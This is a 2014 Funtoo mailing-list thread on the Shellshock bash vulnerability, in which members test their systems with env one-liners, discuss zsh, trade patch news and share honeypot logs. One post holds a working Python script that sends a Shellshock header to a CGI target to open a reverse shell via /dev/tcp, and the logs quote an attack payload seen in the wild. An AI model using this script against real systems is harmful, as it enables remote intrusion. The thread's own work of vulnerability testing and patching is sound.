Remote exploit vulnerability in bash CVE-2014-6271

[Raphael Bastos]

Hello,

Take a look drobbins and oleg:

http://www.csoonline.com/article/2687265/application-security/remote-exploit-in-bash-cve-2014-6271.html

http://blog.erratasec.com/2014/09/bash-bug-as-big-as-heartbleed.html

Funtoo is affected :(

cloud ~ # env x='() { :;}; echo vulneravel' sh -c "echo isso eh um teste"

vulneravel

isso eh um teste

Att,
Raphael Bastos aka Coffnix

====================================================
Linux Reg. User: 388431  //  LPI ID: LPI000214711
email:~> $ echo "xgvngkrhgyzuyFngiqyzuxk4ius4hx" | perl -pe \ 's/(.)/chr(ord($1)-2*3)/ge'

Public Key: 3FBB468B // http://www.hackstore.com.br/coffnix/coffnix-pgp-key.txt

Yaxkin/Gentoo Linux - http://downloads.hackstore.com.br

Wiki Hackstore - http://wiki.hackstore.com.br

Área 31 Hackerspace - http://www.area31.net.br

Kankin/Funtoo Linux - http://kankin.area31.net.br

====================================================

[Mit Zip]

Just tested on zsh 5.0.6, it's affected too...

[Jon Cox]

Mit,

How did you test this? I can't seem to replicate with the same zsh version.

jcox@udu:~ % env x="() { :; }; echo 'vulnerable'" zsh -c "this is a test"
zsh:1: command not found: this
jcox@udu:~ % env x="() { :; }; echo 'vulnerable'" sh -c "this is a test"
vulnerable
sh: this: command not found

Have I missed something?

Cheers,
Jon

[Mit Zip]

I did the originally posted command from within a zsh shell.

[Raphael Bastos]

Hi,

ZSH == BASH ????? :P

Practices "cloned" development or just use the same code? : P

Att,
Raphael Bastos aka Coffnix

====================================================
Linux Reg. User: 388431  //  LPI ID: LPI000214711
email:~> $ echo "xgvngkrhgyzuyFngiqyzuxk4ius4hx" | perl -pe \ 's/(.)/chr(ord($1)-2*3)/ge'

Public Key: 3FBB468B // http://www.hackstore.com.br/coffnix/coffnix-pgp-key.txt

Yaxkin/Gentoo Linux - http://downloads.hackstore.com.br

Wiki Hackstore - http://wiki.hackstore.com.br

Área 31 Hackerspace - http://www.area31.net.br

Kankin/Funtoo Linux - http://kankin.area31.net.br

====================================================

--
--
To manage your subscription, visit this group at
http://groups.google.com/group/funtoo-dev?hl=en
---
Also be sure to check out:
Funtoo Forums: http://forums.funtoo.org
Planet Larry: http://larrythecow.org

---
You received this message because you are subscribed to the Google Groups "Funtoo" group.
To unsubscribe from this group and stop receiving emails from it, send an email to funtoo-dev+...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.

[Mit Zip]

I love funtoo/gentoo... let me count the ways...

env x='() { :;}; echo boo, imma keylogger' sh -c "echo this is a test"   
sh: warning: x: ignoring function definition attempt
sh: error importing function definition for `x'
this is a test

got an upgrade already to 4.2_p48 which fixed zsh BTW

[Raphael Bastos]

Hi,

This problem NOT SOLVE!!!!!!!!! Take a look on the new CVE. 

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169

More infos: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7169

RHEL:: https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2014-7169

Ubuntu: http://people.canonical.com/~ubuntu-security/cve/pkg/bash.html

POC 01: ​https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/​

POC 02: http://www.troyhunt.com/2014/09/everything-you-need-to-know-about.html

Att,
Raphael Bastos aka Coffnix

====================================================
Linux Reg. User: 388431  //  LPI ID: LPI000214711
email:~> $ echo "xgvngkrhgyzuyFngiqyzuxk4ius4hx" | perl -pe \ 's/(.)/chr(ord($1)-2*3)/ge'

Public Key: 3FBB468B // http://www.hackstore.com.br/coffnix/coffnix-pgp-key.txt

Yaxkin/Gentoo Linux - http://downloads.hackstore.com.br

Wiki Hackstore - http://wiki.hackstore.com.br

Área 31 Hackerspace - http://www.area31.net.br

Kankin/Funtoo Linux - http://kankin.area31.net.br

====================================================

--

[Mit Zip]

I love Gentoo/Funtoo AGAIN, let me count the ways...

bash-4.2_p48-r1 was released that has fixed the first incomplete patch...

However, I attempted to exploit servers with the first patch using a method that supposedly the first patch couldn't protect against, they were running nginx+owncloud on funtoo and apache+wordpress on centos 6.5 and could not get the new exploit to work after fiddling with it for quite some time. That may be speaking to my skill more than anything else, but it seems the first patch at least makes things a little more difficult.

With the latest patch I couldn't even get the exploits to work with direct terminal access, where I could before the patch.

Also, check this thread out... http://seclists.org/oss-sec/2014/q3/685

[Mit Zip]

On Thursday, September 25, 2014 2:32:55 PM UTC-5, Mit Zip wrote:

...

However, I attempted to exploit servers with the first patch using a method that supposedly the first patch couldn't protect against, they were running nginx+owncloud on funtoo and apache+wordpress on centos 6.5 and could not get the new exploit to work after fiddling with it for quite some time.

...

I should clarify that my attempts to exploit the servers were via malicious HTTP headers via openssl and telnet ...

[James Lee]

On 09/24/2014 11:21 PM, Mit Zip wrote:
> I love funtoo/gentoo... let me count the ways...
>
> env x='() { :;}; echo boo, imma keylogger' sh -c "echo this is a test"
> sh: warning: x: ignoring function definition attempt
> sh: error importing function definition for `x'
> this is a test
>
> got an upgrade already to 4.2_p48 which fixed zsh BTW

I'm sure it doesn't need to be said, but I will say it anyway. ZSH was
not affected by this vulnerability. The command you are using to test
the vulnerability executes 'sh' which on most Linux systems is bash.
Change 'sh' to 'zsh' and you will see.

James

--
James Lee
https://thestaticvoid.com

[Raphael Bastos]

Hi Mit Zip, Try this. :D

----------------------------------------------------------------------------------------------------------------------

#

#CVE-2014-6271 cgi-bin reverse shell

#

import httplib,urllib,sys

if (len(sys.argv)<4):

    print "Usage: %s <host> <vulnerable CGI> <attackhost/IP>" % sys.argv[0]

    print "Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080" % sys.argv[0]

    exit(0)

conn = httplib.HTTPConnection(sys.argv[1])

reverse_shell="() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3]

headers = {"Content-type": "application/x-www-form-urlencoded",

    "test":reverse_shell }

conn.request("GET",sys.argv[2],headers=headers)

res = conn.getresponse()

print res.status, res.reason

data = res.read()

print data

------------------------------------------------------------------------------------------------------------------------------------

Att,
Raphael Bastos aka Coffnix

====================================================
Linux Reg. User: 388431  //  LPI ID: LPI000214711
email:~> $ echo "xgvngkrhgyzuyFngiqyzuxk4ius4hx" | perl -pe \ 's/(.)/chr(ord($1)-2*3)/ge'

Public Key: 3FBB468B // http://www.hackstore.com.br/coffnix/coffnix-pgp-key.txt

Yaxkin/Gentoo Linux - http://downloads.hackstore.com.br

Wiki Hackstore - http://wiki.hackstore.com.br

Área 31 Hackerspace - http://www.area31.net.br

Kankin/Funtoo Linux - http://kankin.area31.net.br

====================================================

[Mit Zip]

Thanks for the clarification. Being ignorant of the internals of zsh I assumed that zsh was using bash for certain things and that it wasn't a zsh issue per-se.

Initially, I assumed that zsh would somehow have something to do with how environment variables are exposed to programs run, like running sh (which I did understand was bash). Though upon applying the first patch I realized that if zsh did have anything to do with it, it was delegating that function to bash.

Upon further consideration, it seems that it is entirely how bash reads in the environment and zsh is completely hands off.

[Mit Zip]

Thanks for the PoC python code, but unfortunately, I have no applicable CGI scripts to test against.

[Mit Zip]

I guess I could read the whole script before I respond, thanks this will work just fine. (facepalm)

CGI's are more likely because they run with an environment provided by the webserver. I'm not sure how similar running php with fastcgi that is, but I'll see what happens. The other server is using mod_php, so unless wordpess makes some system calls, I would guess it would run a much lower likelihood of being affected.

[Mit Zip]

On Thursday, September 25, 2014 2:47:00 PM UTC-5, Raphael Bastos wrote:Hi Mit Zip, Try this. :D

----------------------------------------------------------------------------------------------------------------------

#

#CVE-2014-6271 cgi-bin reverse shell

#

No dice with the nginx/php-fpm/owncloud system patched with patch 2 and the apache/mod_php/wordpress system patched with patch 1, tested with POST as well as GET requests. Netcat never received any connections.

nc -l -p 8080 -vvv

FWIW, as I think this script does not take advantage of the incompleteness of the first patch.

I would also mention that on my honeypot server the logs are showing some new attempts by third-parties that seemingly are attempting to exploit this bug in the wild.
199.27.179.96 - - [24/Sep/2014:05:35:37 -0500] "GET /tmUnblock.cgi HTTP/1.1" 400 326 "-" "-" "-"
222.167.189.81 - - [25/Sep/2014:11:55:59 -0500] "GET /tmUnblock.cgi HTTP/1.1" 400 326 "-" "-" "-"
180.150.67.2 - - [25/Sep/2014:14:20:12 -0500] "GET /tmUnblock.cgi HTTP/1.1" 400 326 "-" "-" "-"

Seems to be scanning systems for a tmUnblock.cgi script that apparently is perceived to be vulnerable, along with some hits on php.cgi. Could be a coincidence, but the requests for cgi scripts have definitely gone up in the past 48 hours.

[Mit Zip]

This is no coincidence....

89.207.135.125 - - [25/Sep/2014:06:41:37 -0500] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 301 392 "-" "() { :;}; /bin/ping -c 1 198.101.206.138" "-"

[Mit Zip]

Not to be spamming you good funtoo folks, this felt justified...

https://shellshock.detectify.com/

Alright, no more speaking for me, unless spoken too. ;-)

[Daniel Robbins]

I've just finished updating funtoo infrastructure and *all* user containers on funtoo.org to the new bash...

-Daniel

--